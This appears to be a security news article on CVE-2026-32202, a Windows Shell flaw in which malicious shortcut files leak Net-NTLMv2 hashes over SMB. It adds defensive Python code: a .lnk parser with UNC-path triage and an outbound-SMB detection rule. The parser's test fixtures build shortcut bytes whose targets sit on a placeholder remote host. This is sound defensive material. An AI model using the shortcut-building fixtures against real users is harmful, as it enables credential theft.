Microsoft patches Windows Shell flaw after reports of active exploitation
Microsoft has confirmed that a Windows Shell vulnerability tracked as CVE-2026-32202 has been exploited in the wild. The flaw affects the way Windows handles certain malicious shortcut files and can expose sensitive authentication data over a network.
The issue is tied to an earlier Windows Shell security bypass, CVE-2026-21510, which Microsoft patched in February 2026. Akamai researchers found that the February fix stopped the remote code execution path but left behind a separate authentication coercion weakness.
Microsoft addressed CVE-2026-32202 in the April 2026 Patch Tuesday updates. The company later corrected its advisory details on April 27 to reflect exploitation status, exploitability, and CVSS vector information.
What CVE-2026-32202 does
CVE-2026-32202 is a Windows Shell spoofing vulnerability caused by a protection mechanism failure. NVD lists the flaw with a CVSS score of 4.3 and describes it as a network-based issue requiring user interaction.
Akamai’s research adds an important detail. In the attack chain it analyzed, the victim did not need to click the malicious shortcut file to trigger the credential leak. Windows could parse the file while rendering it in Explorer, causing Windows to open an SMB connection to the attacker’s server.
That SMB connection can start an NTLM authentication handshake in which the victim sends its Net-NTLMv2 response (commonly called the Net-NTLMv2 hash) to the attacker’s server. Attackers can later try to relay that authentication to another service or crack the response offline to recover the user’s password.
At a glance
| Item | Details |
|---|---|
| Vulnerability | CVE-2026-32202 |
| Component | Windows Shell |
| Type | Spoofing, protection mechanism failure |
| CVSS score | 4.3, Medium |
| Weakness | CWE-693 |
| Exploitation status | Exploited in the wild |
| Patch | April 2026 Patch Tuesday |
| Discovery | Akamai found it after reviewing the CVE-2026-21510 fix |
| Main risk | Net-NTLMv2 hash exposure through malicious LNK parsing |
| Related actor activity | APT28-linked attacks involving malicious LNK files |
How the attack chain started
The wider campaign goes back to malicious Windows shortcut files used against Ukraine and European Union targets. SecurityWeek reported that the initial activity involved Russia-linked APT28, also known as Fancy Bear, Forest Blizzard, GruesomeLarch, and Sofacy.
Akamai connected the earlier campaign to two vulnerabilities patched in February: CVE-2026-21510 in Windows Shell and CVE-2026-21513 in MSHTML. The combined chain helped attackers bypass Windows security features and execute attacker-controlled code after a victim opened a malicious shortcut file.
Microsoft’s February patch for CVE-2026-21510 added stronger trust verification before the malicious Control Panel component could execute. That helped block the direct remote code execution path.
Why the February patch was incomplete
The problem was timing inside the Windows Shell process. Microsoft’s February fix added verification later in the launch flow, but Akamai found that Windows could still resolve the remote path earlier while Explorer rendered the shortcut.
In practical terms, Windows could try to fetch or inspect a remote Control Panel file before the final SmartScreen-style trust check ran. When that remote path used a UNC format, Windows initiated an SMB connection to the attacker-controlled server.

That is why Akamai described the remaining issue as an authentication coercion flaw. The earlier patch stopped one dangerous outcome, but it did not stop the credential exposure path created by automatic file parsing.
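The shortcut field Explorer resolves while rendering is the same one a defender can read statically. The following is an added example, not code from Akamai, Microsoft or the page, of a small Python reader for the Shell Link (.lnk) format that pulls out the path-bearing fields (the LinkInfo network or local target, plus the relative path, working directory, arguments and icon location strings) and flags any \\host\share reference. The three sample shortcuts are constructed in the script; the 203.0.113.10 address is a documentation range, not a real indicator; and the check is deliberately broader than the page’s .cpl case, since any field that carries a UNC path is reported.

```python
import re
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # MS-SHLLINK header CLSID
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, IS_UNICODE, LI_LOCAL, LI_NETWORK = 0x01, 0x02, 0x80, 0x1, 0x2
STRING_FIELDS = ((0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
                 (0x20, "arguments"), (0x40, "icon_location"))  # fixed StringData order
UNC_RE = re.compile(r"\\\\[^\\\s]+\\[^\\\s]*")  # \\host\share...

def _cstr(buf, off):
    """NUL-terminated ANSI string at buf[off] (LinkInfo strings; Unicode offsets not handled)."""
    return buf[off:buf.index(b"\x00", off)].decode("latin-1")

def parse_lnk(data):
    """Return the path-bearing fields of a .lnk as a dict; ExtraData blocks are not parsed."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:  # skip IDListSize (u16) + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    info = {"net_name": None, "local_base_path": None, "path_suffix": None}
    if flags & HAS_LINK_INFO:
        li = pos
        size, _, li_flags, _, lbp_off, cnrl_off, suffix_off = struct.unpack_from("<7I", data, li)
        if li_flags & LI_LOCAL:
            info["local_base_path"] = _cstr(data, li + lbp_off)
        if li_flags & LI_NETWORK:  # CommonNetworkRelativeLink: size, flags, NetNameOffset, ...
            cnrl = li + cnrl_off
            info["net_name"] = _cstr(data, cnrl + struct.unpack_from("<3I", data, cnrl)[2])
        info["path_suffix"] = _cstr(data, li + suffix_off)
        pos = li + size
    unicode = bool(flags & IS_UNICODE)
    for bit, field in STRING_FIELDS:  # CountCharacters (u16) then the chars, no terminator
        if flags & bit:
            n = struct.unpack_from("<H", data, pos)[0]
            raw = data[pos + 2:pos + 2 + (n * 2 if unicode else n)]
            pos += 2 + len(raw)
            info[field] = raw.decode("utf-16-le" if unicode else "latin-1")
    return info

def resolved_target(info):
    """Path Explorer resolves from LinkInfo: \\server\share\suffix or C:\base\suffix."""
    if info["net_name"]:
        return info["net_name"] + "\\" + info["path_suffix"]
    if info["local_base_path"] is not None:
        return info["local_base_path"] + info["path_suffix"]
    return None

def remote_references(info):
    """(field, value) for every field that names a \\host\share path; [] means clean."""
    hits = [("link_info.net_name", info["net_name"])] if info["net_name"] else []
    for field in ("local_base_path", "relative_path", "working_dir", "arguments", "icon_location"):
        value = info.get(field)
        if value and UNC_RE.search(value):
            hits.append((field, value))
    return hits

# --- constructed sample shortcuts (built here for the demo, not real malware) ---
def _header(flags):  # 76-byte ShellLinkHeader: CLSID, flags, ARCHIVE attribute, zero times, SW_SHOWNORMAL
    return (struct.pack("<I16sII", 0x4C, LNK_CLSID, flags, 0x20) + b"\x00" * 24
            + struct.pack("<IiIHHII", 0, 0, 1, 0, 0, 0, 0))

def _link_info_network(net_name, suffix):
    net = net_name.encode("latin-1") + b"\x00"
    cnrl = struct.pack("<5I", 0x14 + len(net), 0x2, 0x14, 0, 0x20000) + net  # ValidNetType, WNNC_NET_LANMAN
    suf = suffix.encode("latin-1") + b"\x00"
    return struct.pack("<7I", 0x1C + len(cnrl) + len(suf), 0x1C, LI_NETWORK, 0, 0, 0x1C,
                       0x1C + len(cnrl)) + cnrl + suf

def _link_info_local(base_path):
    vol = struct.pack("<4I", 0x11, 3, 0, 0x10) + b"\x00"  # VolumeID: DRIVE_FIXED, empty label
    base = base_path.encode("latin-1") + b"\x00"
    return struct.pack("<7I", 0x1C + len(vol) + len(base) + 1, 0x1C, LI_LOCAL, 0x1C, 0x1C + len(vol), 0,
                       0x1C + len(vol) + len(base)) + vol + base + b"\x00"

def _strings(**fields):
    flags, body = IS_UNICODE, b""
    for bit, name in STRING_FIELDS:
        if name in fields:
            flags |= bit
            body += struct.pack("<H", len(fields[name])) + fields[name].encode("utf-16-le")
    return flags, body

_f, _s = _strings(name="Quarterly report")  # LinkInfo points at a .cpl on a remote host
SAMPLE_REMOTE_CPL = _header(_f | HAS_LINK_INFO) + _link_info_network("\\\\203.0.113.10\\share", "report.cpl") + _s
_f, _s = _strings(relative_path=".\\notepad.exe", working_dir="C:\\Windows")  # benign local shortcut
SAMPLE_LOCAL = _header(_f | HAS_LINK_INFO) + _link_info_local("C:\\Windows\\notepad.exe") + _s
_f, _s = _strings(icon_location="\\\\203.0.113.10\\icons\\doc.ico")  # local target, remote icon
SAMPLE_REMOTE_ICON = _header(_f | HAS_LINK_INFO) + _link_info_local("C:\\Windows\\notepad.exe") + _s

def triage(samples):
    """label -> remote references found; on a real folder, feed it each .lnk's bytes."""
    return {label: remote_references(parse_lnk(blob)) for label, blob in samples.items()}

if __name__ == "__main__":
    print(triage({"remote_cpl": SAMPLE_REMOTE_CPL, "local": SAMPLE_LOCAL, "remote_icon": SAMPLE_REMOTE_ICON}))
```

To sweep a mail quarantine or a user’s Downloads folder, read each .lnk into bytes and pass it to triage; anything that comes back non-empty is a shortcut Explorer may try to reach over the network before the user opens it.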
What attackers can gain
The direct impact is not full system takeover by itself. NVD’s CVSS vector lists confidentiality impact as low, with no integrity or availability impact.
However, stolen Net-NTLMv2 responses can still help attackers. They may relay the authentication to internal services that do not require signing, attempt offline cracking to recover the user’s password, or combine the result with other weaknesses in the network. A Net-NTLMv2 response cannot be replayed directly as a pass-the-hash credential, so relay and cracking are the practical follow-on steps.
That makes the bug more serious in enterprise environments where users browse shared folders, download attachments, or handle shortcut files from untrusted sources.
Affected Windows versions
NVD lists multiple Windows versions as affected before the April fixes. The affected configurations include Windows 11 23H2, 24H2, 25H2, and 26H1 builds below the fixed build numbers listed in the record.
The April 2026 Patch Tuesday updates address the issue. Organizations should confirm that endpoints have received the relevant cumulative update and should prioritize systems that handle external files, shared folders, and email attachments.
Security teams should also watch for systems that cannot update quickly, such as kiosk machines, shared workstations, legacy business endpoints, and jump boxes.
What defenders should monitor
- Outbound SMB traffic to external or unknown hosts.
- Windows Explorer opening folders that contain unusual .lnk files.
- Shortcut files with embedded UNC paths.
- NTLM authentication attempts to internet-facing systems.
- Email or archive attachments containing .lnk files.
- Suspicious access to WebDAV, SMB, or remote share paths.
- Authentication attempts shortly after users browse downloaded folders.
- APT28-related indicators from existing threat intelligence feeds.
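The first and second-to-last items in that list combine into one rule: an outbound SMB connection to an external host is worth an alert on its own, and worth a louder one when the same machine wrote a shortcut file moments earlier. The following is an added example, not a detection shipped by Microsoft, Akamai or any vendor, written over constructed Sysmon-style records (EventID 3 network connects and EventID 11 file creates); the field names follow Sysmon’s, the allowlisted file server 10.0.0.5 and the five-minute window are assumptions, and the external hosts use documentation address ranges.

```python
import ipaddress
import json
from datetime import datetime, timedelta

SMB_PORTS = {445, 139}
KNOWN_FILE_SERVERS = {"10.0.0.5"}  # assumed corporate file servers; tune per environment
# Explicit internal ranges rather than ipaddress.is_private: Python also treats the
# documentation ranges used in the sample below (203.0.113.0/24 etc.) as non-global.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]
LNK_WINDOW = timedelta(minutes=5)  # how long a fresh .lnk write counts as "recent" for a host

def is_external(ip):
    """True when the address is outside the internal ranges above."""
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)

def detect(events):
    """Alert on outbound SMB to external hosts in Sysmon-style records (EventID 3 network
    connects, EventID 11 file creates). Severity is raised when the same computer wrote a
    .lnk shortly before. Keyed by Computer, not User or Image: the SMB redirector connects
    from the System process, so the user who browsed the folder is not on the EID 3 record."""
    recent_lnk, alerts = {}, []
    for e in sorted(events, key=lambda r: r["UtcTime"]):
        t = datetime.strptime(e["UtcTime"], "%Y-%m-%d %H:%M:%S")
        if e["EventID"] == 11 and e["TargetFilename"].lower().endswith(".lnk"):
            recent_lnk[e["Computer"]] = (t, e["TargetFilename"])
        elif e["EventID"] == 3 and e["Protocol"] == "tcp" and int(e["DestinationPort"]) in SMB_PORTS:
            dst = e["DestinationIp"]
            if dst in KNOWN_FILE_SERVERS or not is_external(dst):
                continue
            alert = {"time": e["UtcTime"], "computer": e["Computer"], "image": e["Image"],
                     "destination": f"{dst}:{e['DestinationPort']}", "severity": "medium",
                     "reason": "outbound SMB to external host"}
            last = recent_lnk.get(e["Computer"])
            if last and timedelta(0) <= t - last[0] <= LNK_WINDOW:
                alert["severity"] = "high"
                alert["reason"] += f"; {last[1]} written {int((t - last[0]).total_seconds())}s earlier"
            alerts.append(alert)
    return alerts

# Constructed sample telemetry (not real logs); external hosts use documentation address ranges.
SAMPLE_JSONL = r"""
{"EventID": 11, "UtcTime": "2026-04-20 09:00:05", "Computer": "WS01", "Image": "C:\\Windows\\explorer.exe", "TargetFilename": "C:\\Users\\alice\\Downloads\\invoice.lnk"}
{"EventID": 3, "UtcTime": "2026-04-20 09:00:41", "Computer": "WS01", "Image": "System", "Protocol": "tcp", "DestinationIp": "203.0.113.10", "DestinationPort": 445}
{"EventID": 3, "UtcTime": "2026-04-20 09:15:00", "Computer": "WS01", "Image": "System", "Protocol": "tcp", "DestinationIp": "10.0.0.5", "DestinationPort": 445}
{"EventID": 3, "UtcTime": "2026-04-20 10:00:00", "Computer": "WS02", "Image": "System", "Protocol": "tcp", "DestinationIp": "198.51.100.7", "DestinationPort": 445}
{"EventID": 3, "UtcTime": "2026-04-20 10:01:00", "Computer": "WS02", "Image": "C:\\Windows\\explorer.exe", "Protocol": "tcp", "DestinationIp": "198.51.100.7", "DestinationPort": 443}
"""
SAMPLE_EVENTS = [json.loads(line) for line in SAMPLE_JSONL.strip().splitlines()]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(a["severity"].upper(), a["computer"], a["destination"], a["reason"])
```

Two caveats when moving this onto real telemetry. First, if outbound 445 is blocked at the edge and the WebClient service is running, Windows can fall back to WebDAV over HTTP for the same UNC path, so a production rule should also watch the svchost.exe instance hosting WebClient on ports 80 and 443 rather than SMB ports alone. Second, the correlation is per computer on purpose: tying the .lnk write to the connection by user or process would miss the connection entirely, because the redirector makes it from System.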
Why this matters for businesses
This flaw shows how small gaps in patch logic can leave useful attack paths behind. Microsoft fixed the original code execution vector, but attackers could still abuse Windows Shell behavior to trigger credential leakage.
That matters because credential theft often drives the next stage of an intrusion. A stolen hash can help attackers move laterally, reach internal services, or escalate access if the environment still relies heavily on NTLM.
Companies should treat this as both a patching issue and an identity-security issue. Blocking unsafe file types helps, but reducing NTLM exposure and limiting outbound SMB can lower the risk of similar attacks.
How organizations can reduce the risk
- Install the April 2026 Windows security updates on all supported systems.
- Block outbound SMB (TCP 445 and 139) to the internet at the firewall; if the WebClient service is enabled, Windows can fall back to WebDAV over HTTP for the same UNC path, so restrict that route too.
- Disable or restrict NTLM where possible.
- Use Kerberos-first authentication in managed environments.
- Train users not to open unexpected .lnk files.
- Filter shortcut files from email and web downloads where practical.
- Monitor Windows Shell and Explorer behavior around suspicious folders.
- Review authentication logs for unusual NTLM activity.
- Apply Microsoft Defender and endpoint detection updates.
- Use attack surface reduction rules for suspicious file and script behavior.
FAQ
What is CVE-2026-32202?
CVE-2026-32202 is a Windows Shell spoofing vulnerability caused by a protection mechanism failure. It can allow attackers to expose sensitive information over a network.
Has it been exploited in the wild?
Yes. Microsoft updated its advisory to show that the vulnerability has been exploited in the wild, and The Hacker News reported that Microsoft corrected the exploited flag on April 27, 2026.
How does the attack work?
The attack uses a malicious Windows shortcut file that causes Windows Shell to resolve a remote UNC path. That can trigger an SMB connection and send the victim’s Net-NTLMv2 hash to an attacker-controlled server.
Does the victim have to click the shortcut?
Akamai found that the remaining flaw could trigger without a click because Windows Explorer parses shortcut files while rendering folder contents. Microsoft’s advisory still lists user interaction in the CVSS vector.